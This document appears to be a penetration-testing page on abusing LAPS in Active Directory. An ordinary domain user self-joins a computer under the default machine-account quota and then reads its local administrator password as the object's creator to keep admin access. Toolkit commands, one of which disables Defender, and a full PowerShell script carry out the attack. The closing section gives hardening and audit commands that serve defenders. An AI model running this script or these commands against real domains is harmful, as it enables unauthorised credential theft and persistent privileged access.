Abusing LAPS Toolkit
Introduction
If the ms-DS-MachineAccountQuota attribute still has its default value (10) and the permission to join computers to the domain has not been delegated to a specific group, any domain user can add a computer account to Active Directory under that quota. After LAPS is installed on the added host, the same user reads its local administrator password (the ms-Mcs-AdmPwd attribute) and uses it for persistence. When LAPS is set up, only selected principals are granted the right to read the password; however, the user who created the computer object holds All extended rights over it and can therefore read the LAPS password anyway. This bypasses GPO restrictions: even after a GPO has removed the user from the local Administrators group (for example a Restricted Groups policy that strips undefined members), the user can log on with the LAPS-managed local administrator password, edit registry settings or add their own account back to the local Administrators group.
- Open a non-domain-joined Windows virtual machine.
- Download LAPS.x64.msi and install it together with the PowerShell module extension (AdmPwd.PS).
- Import AdmPwd.PS:
  `Import-Module AdmPwd.PS`
- Add the computer to Active Directory with the domain user's credentials:
  `Add-ComputerToDomainWithUserRights`
- Read the local administrator password and determine the LAPS password policy:
  - If you are still a member of the local Administrators group after the GPO has been applied, read the ms-Mcs-AdmPwd attribute via PowerView.ps1:
    `Get-LapsLocalAdminPassword -disableDefender`
  - If you are no longer a member of the local Administrators group after the GPO has been applied, read the ms-Mcs-AdmPwd attribute via AdmPwd.PS:
    `Get-LapsAdmPwd -LapsInstalled`
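The same chain, written as an added example with built-in PowerShell and .NET DirectoryServices calls rather than the toolkit's own wrapper functions, so that every step (quota check, self-join, attribute read) can be verified by hand. This is not code from the toolkit or from the page; the domain controller `dc01.corp.local`, the domain `corp.local` / `DC=corp,DC=local`, the hostname `USERPC01`, the credential prompt and the helper names `Get-LdapEntry` and `Get-LapsPasswordAsCreator` are all assumptions for the example.

```powershell
# Added example (not part of the toolkit): self-join with an ordinary domain user,
# then read ms-Mcs-AdmPwd as the creator of the computer object.
# Assumed names: DC "dc01.corp.local", domain "corp.local" (DC=corp,DC=local),
# new hostname "USERPC01", an ordinary domain user with no delegated rights.
$Dc       = 'dc01.corp.local'
$Domain   = 'corp.local'
$DomainDn = 'DC=corp,DC=local'
$NewHost  = 'USERPC01'
$Cred     = Get-Credential -Message 'Ordinary domain user (DOMAIN\user)'

function Get-LdapEntry {
    # Bind to an LDAP path with explicit credentials; works from a non-joined VM.
    param([string]$Path, [pscredential]$Credential)
    New-Object System.DirectoryServices.DirectoryEntry(
        $Path, $Credential.UserName, $Credential.GetNetworkCredential().Password)
}

# 1. Is the default quota still in place? 10 means every authenticated user may
#    create up to ten machine accounts; 0 closes the door.
$domainEntry = Get-LdapEntry -Path "LDAP://$Dc/$DomainDn" -Credential $Cred
$quota = [int]$domainEntry.Properties['ms-DS-MachineAccountQuota'].Value
if ($quota -le 0) { throw "ms-DS-MachineAccountQuota is $quota; self-join is blocked" }
Write-Host "ms-DS-MachineAccountQuota = $quota"

# 2. Join with the ordinary user's credentials. Because this account creates the
#    computer object it becomes its owner, which is where the extended rights come from.
Add-Computer -DomainName $Domain -NewName $NewHost -Credential $Cred -Force
Write-Host 'Reboot, let the LAPS client install and the GPO apply, then run step 3.'

# 3. Read ms-Mcs-AdmPwd as the creating user. The attribute is confidential, so the
#    DC simply omits it for callers without the read right: an empty result means
#    "no right (or LAPS has not rotated the password yet)", not "no such attribute".
function Get-LapsPasswordAsCreator {
    param([string]$ComputerName, [string]$Server, [string]$SearchBase, [pscredential]$Credential)
    $root     = Get-LdapEntry -Path "LDAP://$Server/$SearchBase" -Credential $Credential
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter = "(&(objectCategory=computer)(sAMAccountName=$ComputerName`$))"
    [void]$searcher.PropertiesToLoad.Add('ms-Mcs-AdmPwd')
    [void]$searcher.PropertiesToLoad.Add('ms-Mcs-AdmPwdExpirationTime')
    $result = $searcher.FindOne()
    if (-not $result) { throw "No computer object named $ComputerName under $SearchBase" }
    $pwd = $result.Properties['ms-mcs-admpwd']
    if (-not $pwd -or $pwd.Count -eq 0) {
        throw 'ms-Mcs-AdmPwd not returned: caller lacks the read right, or LAPS has not set it yet'
    }
    $expiry = [datetime]::FromFileTime([int64]$result.Properties['ms-mcs-admpwdexpirationtime'][0])
    [pscustomobject]@{ ComputerName = $ComputerName; Password = $pwd[0]; Expires = $expiry }
}

Get-LapsPasswordAsCreator -ComputerName $NewHost -Server $Dc -SearchBase $DomainDn -Credential $Cred
```

Once AdmPwd.PS is imported, `Get-AdmPwdPassword -ComputerName $NewHost` run under the same ordinary user account should return the identical value; if it returns nothing, the creator right has been removed or the LAPS GPO has not yet rotated the password on that host.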
Mitigation
The Microsoft LAPS installation documentation has been updated, so configure LAPS according to the LAPS_OperationsGuide.docx and LAPS_TechnicalSpecification documents: https://www.microsoft.com/en-us/download/confirmation.aspx?id=46899 If LAPS (Local Administrator Password Solution) is used, set ms-DS-MachineAccountQuota to "0", or delegate the right to add computers to the domain to a specific user group. Otherwise any domain user can add a computer to the domain, read its local administrator password and learn the LAPS password policy through this misconfiguration.
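The mitigation above as concrete commands, plus an audit of who actually holds the password-read right, written as an added example that is not from the page or from Microsoft's documentation. It uses the ActiveDirectory module, `dsacls` and the real AdmPwd.PS cmdlets `Set-AdmPwdReadPasswordPermission` and `Find-AdmPwdExtendedRights`; the domain `corp.local`, the OU `OU=Workstations,DC=corp,DC=local`, the groups `CORP\Domain-Join-Operators` and `CORP\LAPS-Readers`, and the helper name `Find-UnexpectedLapsReaders` are assumptions for the example.

```powershell
# Added example (not from the page): close the quota, delegate joins to one group,
# make the LAPS read right explicit, then audit for extra readers.
# Assumed names: domain "corp.local", OU "OU=Workstations,DC=corp,DC=local",
# groups "CORP\Domain-Join-Operators" and "CORP\LAPS-Readers".
# Run as a Domain Admin on a host with RSAT (ActiveDirectory) and AdmPwd.PS installed.
Import-Module ActiveDirectory
Import-Module AdmPwd.PS

$Domain      = 'corp.local'
$Ou          = 'OU=Workstations,DC=corp,DC=local'
$JoinGroup   = 'CORP\Domain-Join-Operators'
$LapsReaders = 'CORP\LAPS-Readers'

# 1. ms-DS-MachineAccountQuota = 0: ordinary users can no longer self-join. Read it back.
Set-ADDomain -Identity $Domain -Replace @{ 'ms-DS-MachineAccountQuota' = '0' }
$domainDn = (Get-ADDomain -Identity $Domain).DistinguishedName
$quota = (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
if ($quota -ne 0) { throw "ms-DS-MachineAccountQuota is still $quota" }

# 2. Delegate creation of computer objects in the workstation OU to one group instead.
#    "CC;computer" = create child objects of class computer; /I:T applies the ACE to
#    the OU and everything beneath it.
dsacls $Ou /I:T /G "${JoinGroup}:CC;computer"

# 3. Grant the LAPS read right explicitly to the intended readers only.
Set-AdmPwdReadPasswordPermission -Identity $Ou -AllowedPrincipals $LapsReaders

# 4. Audit: list every holder of the extended right that is not on the expected list.
#    -IncludeComputers also reports per-computer ACEs, which is where a self-joining
#    user's creator rights show up; OU-level delegation alone would hide them.
function Find-UnexpectedLapsReaders {
    param([string]$SearchBase, [string[]]$Expected)
    Find-AdmPwdExtendedRights -Identity $SearchBase -IncludeComputers | ForEach-Object {
        $extra = @($_.ExtendedRightHolders | Where-Object { $Expected -notcontains $_ })
        if ($extra.Count -gt 0) {
            [pscustomobject]@{ ObjectDN = $_.ObjectDN; UnexpectedReaders = ($extra -join ', ') }
        }
    }
}

Find-UnexpectedLapsReaders -SearchBase $Ou -Expected @('NT AUTHORITY\SYSTEM', 'CORP\Domain Admins', $LapsReaders)
```

Any object reported by the audit with an individual user account among its readers is a computer that was joined by that user; removing the offending ACE (or re-creating the object under the delegated group) closes the persistence path the rest of this page describes.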